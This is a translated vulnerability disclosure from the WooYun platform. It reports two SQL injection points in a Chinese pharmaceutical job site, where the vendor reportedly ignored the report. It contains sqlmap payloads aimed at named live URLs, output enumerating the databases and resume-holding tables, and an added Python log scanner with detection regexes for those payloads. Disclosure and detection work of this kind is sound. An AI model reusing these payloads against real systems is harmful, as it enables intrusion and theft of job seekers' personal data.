Vulnerability summary

Defect ID: wooyun-2015-0144955

Title: 2 SQL injection points in 中国药业人才网 (China Pharmaceutical Talent Network)

Vendor: 中国药业人才网

Author: 路人甲

Submitted: 2015-10-08 18:22

Fix time: 2015-11-22 18:24

Published: 2015-11-22 18:24

Vulnerability type: SQL injection

Severity: Medium

Self-assessed Rank: 10

Status: Vendor could not be contacted, or the vendor actively ignored the report

Source: http://www.wooyun.org; for questions or help contact [email protected]



Vulnerability details

Disclosure status:

2015-10-08: Actively contacting the vendor and waiting for the vendor to claim the report; details not disclosed publicly
2015-11-22: The vendor has actively ignored the vulnerability; details disclosed to the public

Brief description:

2 SQL injection points in 中国药业人才网

Detailed description:

1. http://tj.medejob.com/jobseeker/stage/FAQ_Question.aspx?id=9


sqlmap resumed the following injection point(s) from stored session:
---
Parameter: id (GET)
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: id=9 AND 1932=1932
Type: error-based
Title: Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause
Payload: id=9 AND 7049=CONVERT(INT,(SELECT CHAR(113)+CHAR(106)+CHAR(112)+CHAR(98)+CHAR(113)+(SELECT (CASE WHEN (7049=7049) THEN CHAR(49) ELSE CHAR(48) END))+CHAR(113)+CHAR(122)+CHAR(112)+CHAR(122)+CHAR(113)))
---
[23:59:26] [INFO] the back-end DBMS is Microsoft SQL Server
web server operating system: Windows
web application technology: ASP.NET
back-end DBMS: Microsoft SQL Server 2008
[23:59:26] [INFO] fetching database names
[23:59:26] [INFO] the SQL query used returns 15 entries
[23:59:26] [INFO] resumed: 2mdb
[23:59:26] [INFO] resumed: 52hoteldb
[23:59:26] [INFO] resumed: bptdb
[23:59:26] [INFO] resumed: cptdb
[23:59:26] [INFO] resumed: hospdb
[23:59:26] [INFO] resumed: jrdb
[23:59:26] [INFO] resumed: linyuedb
[23:59:26] [INFO] resumed: master
[23:59:26] [INFO] resumed: medejobdb
[23:59:26] [INFO] resumed: model
[23:59:26] [INFO] resumed: msdb
[23:59:26] [INFO] resumed: myshipjobdb
[23:59:26] [INFO] resumed: oiljobdb
[23:59:26] [INFO] resumed: spadb
[23:59:26] [INFO] resumed: tempdb
available databases [15]:
[*] 2mdb
[*] 52hoteldb
[*] bptdb
[*] cptdb
[*] hospdb
[*] jrdb
[*] linyuedb
[*] master
[*] medejobdb
[*] model
[*] msdb
[*] myshipjobdb
[*] oiljobdb
[*] spadb
[*] tempdb


2. http://ln.medejob.com/jobseeker/stage/FAQ_Question.aspx?class=1


sqlmap resumed the following injection point(s) from stored session:
---
Parameter: class (GET)
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: class=1 AND 2079=2079
Type: error-based
Title: Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause
Payload: class=1 AND 4570=CONVERT(INT,(SELECT CHAR(113)+CHAR(106)+CHAR(112)+CHAR(107)+CHAR(113)+(SELECT (CASE WHEN (4570=4570) THEN CHAR(49) ELSE CHAR(48) END))+CHAR(113)+CHAR(122)+CHAR(107)+CHAR(112)+CHAR(113)))
Type: UNION query
Title: Generic UNION query (NULL) - 5 columns
Payload: class=1 UNION ALL SELECT NULL,NULL,NULL,CHAR(113)+CHAR(106)+CHAR(112)+CHAR(107)+CHAR(113)+CHAR(122)+CHAR(114)+CHAR(89)+CHAR(84)+CHAR(98)+CHAR(83)+CHAR(78)+CHAR(107)+CHAR(74)+CHAR(98)+CHAR(113)+CHAR(122)+CHAR(107)+CHAR(112)+CHAR(113),NULL--
---
[23:58:25] [INFO] the back-end DBMS is Microsoft SQL Server
web server operating system: Windows
web application technology: ASP.NET
back-end DBMS: Microsoft SQL Server 2008
[23:58:25] [INFO] fetching database names
[23:58:25] [INFO] the SQL query used returns 15 entries
[23:58:25] [INFO] resumed: "2mdb"
[23:58:25] [INFO] resumed: "52hoteldb"
[23:58:25] [INFO] resumed: "bptdb"
[23:58:25] [INFO] resumed: "cptdb"
[23:58:25] [INFO] resumed: "hospdb"
[23:58:25] [INFO] resumed: "jrdb"
[23:58:26] [INFO] resumed: "linyuedb"
[23:58:26] [INFO] resumed: "master"
[23:58:26] [INFO] resumed: "medejobdb"
[23:58:26] [INFO] resumed: "model"
[23:58:26] [INFO] resumed: "msdb"
[23:58:26] [INFO] resumed: "myshipjobdb"
[23:58:26] [INFO] resumed: "oiljobdb"
[23:58:26] [INFO] resumed: "spadb"
[23:58:26] [INFO] resumed: "tempdb"
available databases [15]:
[*] 2mdb
[*] 52hoteldb
[*] bptdb
[*] cptdb
[*] hospdb
[*] jrdb
[*] linyuedb
[*] master
[*] medejobdb
[*] model
[*] msdb
[*] myshipjobdb
[*] oiljobdb
[*] spadb
[*] tempdb
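
As an added defensive example (not part of the original report), the following Python scans IIS-style access-log lines for the three request patterns sqlmap reported against both endpoints above: the boolean tautology `AND n=n`, the MSSQL `CONVERT(INT, ...)` error-based probe with `CHAR()` concatenation, and the `UNION ALL SELECT`. The log lines and their field layout are constructed assumptions.

```python
import re
from urllib.parse import unquote_plus

# Constructed IIS W3C-style log lines (not from the report):
# date time cs-uri-stem cs-uri-query sc-status
SAMPLE_LOG = """\
2015-10-07 23:59:20 /jobseeker/stage/FAQ_Question.aspx id=9 200
2015-10-07 23:59:26 /jobseeker/stage/FAQ_Question.aspx id=9%20AND%201932%3D1932 200
2015-10-07 23:59:27 /jobseeker/stage/FAQ_Question.aspx id=9%20AND%207049%3DCONVERT%28INT%2C%28SELECT%20CHAR%28113%29%2BCHAR%28106%29%29%29 500
2015-10-07 23:58:25 /jobseeker/stage/FAQ_Question.aspx class=1%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CCHAR%28113%29%2CNULL-- 200
2015-10-07 23:58:30 /jobseeker/stage/FAQ_Question.aspx class=1 200
"""

# Signatures for the three techniques sqlmap reported against this MSSQL back end.
SIGNATURES = {
    "boolean_tautology": re.compile(r"\bAND\s+(\d+)\s*=\s*\1\b", re.I),
    "mssql_error_convert": re.compile(r"\bCONVERT\s*\(\s*INT\s*,", re.I),
    "char_concat": re.compile(r"CHAR\(\d+\)\s*\+\s*CHAR\(\d+\)", re.I),
    "union_select": re.compile(r"\bUNION\s+(?:ALL\s+)?SELECT\b", re.I),
}

def classify_query(raw_query):
    """Decode a query string and return the names of every signature it matches."""
    decoded = unquote_plus(raw_query)
    return [name for name, rx in SIGNATURES.items() if rx.search(decoded)]

def scan_log(text):
    """Return one finding per suspicious request: time, endpoint, parameter, status, tags."""
    findings = []
    for line in text.splitlines():
        fields = line.split()
        if len(fields) < 5:
            continue  # skip blank or malformed lines
        _date, time, stem, query, status = fields[:5]
        tags = classify_query(query)
        if tags:
            findings.append({
                "time": time,
                "endpoint": stem,
                "param": query.split("=", 1)[0],
                "status": int(status),
                # a 5xx on an error-based probe suggests the payload reached the DB engine
                "db_error_seen": int(status) >= 500 and "mssql_error_convert" in tags,
                "tags": tags,
            })
    return findings
```

Running `scan_log(SAMPLE_LOG)` flags the three probe requests and leaves the two ordinary lookups untouched; the `param` field shows which of the two injected parameters (`id` or `class`) each probe targeted.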


Proof of vulnerability:

Database: medejobdb
+-----------------------------------------+---------+
| Table | Entries |
+-----------------------------------------+---------+
| dbo.Experience | 150793 |
| dbo.VIEW_QUERYRESUME | 99551 |
| dbo.JobseekerUser | 95990 |
| dbo.Education | 93011 |
| dbo.view_resume | 85005 |
| dbo.view_resumeUnionju | 84912 |
| dbo.View_DepartPosList | 53259 |
| dbo.VIEW_POSITION | 51477 |
| dbo.CompanyStat | 35131 |
| dbo.VIEW_COMPANYSTAT | 34986 |
| dbo.Baidu_xml | 31835 |
| dbo.Temp_ImportResume | 30737 |
| dbo.Train | 29043 |
| dbo.T_CompanyClub | 9323 |
| dbo.T_User_Other | 9323 |
| dbo.ResumeEn | 5289 |
| dbo.ResumeVisitors | 4684 |
| dbo.CompanyLogin | 4517 |
| dbo.view_companyLogin | 4410 |
| dbo.AppRequest | 3760 |
| dbo.ResumeFavoriteType | 2045 |
| dbo.PositionLatest | 1985 |
| dbo.positionWeb | 1856 |
| dbo.CompanyDepart | 1780 |
| dbo.Selfproject | 1430 |
| dbo.RecommendCompany | 1318 |
| dbo.view_adAndCompany | 1009 |
| dbo.report_resumeStatByAddress | 966 |
| dbo.Certificate | 880 |
| dbo.resumeFollow | 538 |
| dbo.SearchCompanyFilter | 451 |
| dbo.CompanyEmailTemplate | 410 |
| dbo.CompanySMSTemplate | 408 |
| dbo.ResumeRecommLog | 377 |
| dbo.ResumeRecommLog | 377 |
| dbo.ToolsFile | 364 |
| dbo.ToolsFile | 364 |
| dbo.School | 315 |
| dbo.AddressEn | 307 |
| dbo.AddressEn | 307 |
| dbo.Sites | 297 |
| dbo.AdPosition | 245 |
| dbo.RecomendPosition | 177 |
| dbo.Dictionary | 174 |
| dbo.MonthResumeLog | 126 |
| dbo.PositionCategoryEn | 120 |
| dbo.PositionCategoryEn | 120 |
| dbo.DayViewResumeLog | 113 |
| dbo.report_resumeStatByPositionCategory | 111 |
| dbo.ResumeSiteRef | 108 |
| dbo.view_RecommendResume | 108 |
| dbo.CompanyDelLog | 79 |
| dbo.CompanyDelList | 58 |
| dbo.ResumeFilter | 58 |
| dbo.IndustryEn | 42 |
| dbo.IndustryEn | 42 |
| dbo.AdRight | 40 |
| dbo.Zph_Position | 36 |
| dbo.HumanResources | 26 |
| dbo.syncCompany | 25 |
| dbo.DictionaryWelfare | 23 |
| dbo.CompanyTemplate | 21 |
| dbo.ResumePhotoLatest | 20 |
| dbo.FAQ_Question | 19 |
| dbo.Zph_Company | 19 |
| dbo.ArticleType | 16 |
| dbo.ServiceUnitPrice | 16 |
| dbo.IntentionEN | 15 |
| dbo.IntentionEN | 15 |
| dbo.CompanyProperty | 14 |
| dbo.CompanyNews | 12 |
| dbo.Mot_Publish_ResumeDetail | 12 |
| dbo.Mot_Publish_ResumeDetail | 12 |
| dbo.FlashADItem | 11 |
| dbo.FlashADItem | 11 |
| dbo.Ad_Urgent | 10 |
| dbo.Ad_Urgent | 10 |
| dbo.view_qyb | 10 |
| dbo.AdSize | 9 |
| dbo.syncPosition | 9 |
| dbo.CompanyAttach | 8 |
| dbo.CompanyAttach | 8 |
| dbo.ResumeSuPei | 8 |
| dbo.exposition | 7 |
| dbo.FAQ_Class | 7 |
| dbo.WebSiteMessageClass | 6 |
| dbo.WebSiteMessageClass | 6 |
| dbo.AdType | 4 |
| dbo.EmailType | 4 |
| dbo.RegistType | 4 |
| dbo.Zph_Class | 4 |
| dbo.CompanyFeedback | 1 |
| dbo.CompanyRequire | 1 |
| dbo.ResumeFavoriteEn | 1 |
| dbo.ResumeFavoriteEn | 1 |
| dbo.ResumeFeedback | 1 |
| dbo.SendXSoft | 1 |
| dbo.Temp_ResumeByID | 1 |
+-----------------------------------------+---------+

Fix recommendation:

Copyright notice: when reposting, credit the source 路人甲@乌云


Vulnerability response

Vendor response:

Could not reach the vendor, or the vendor actively declined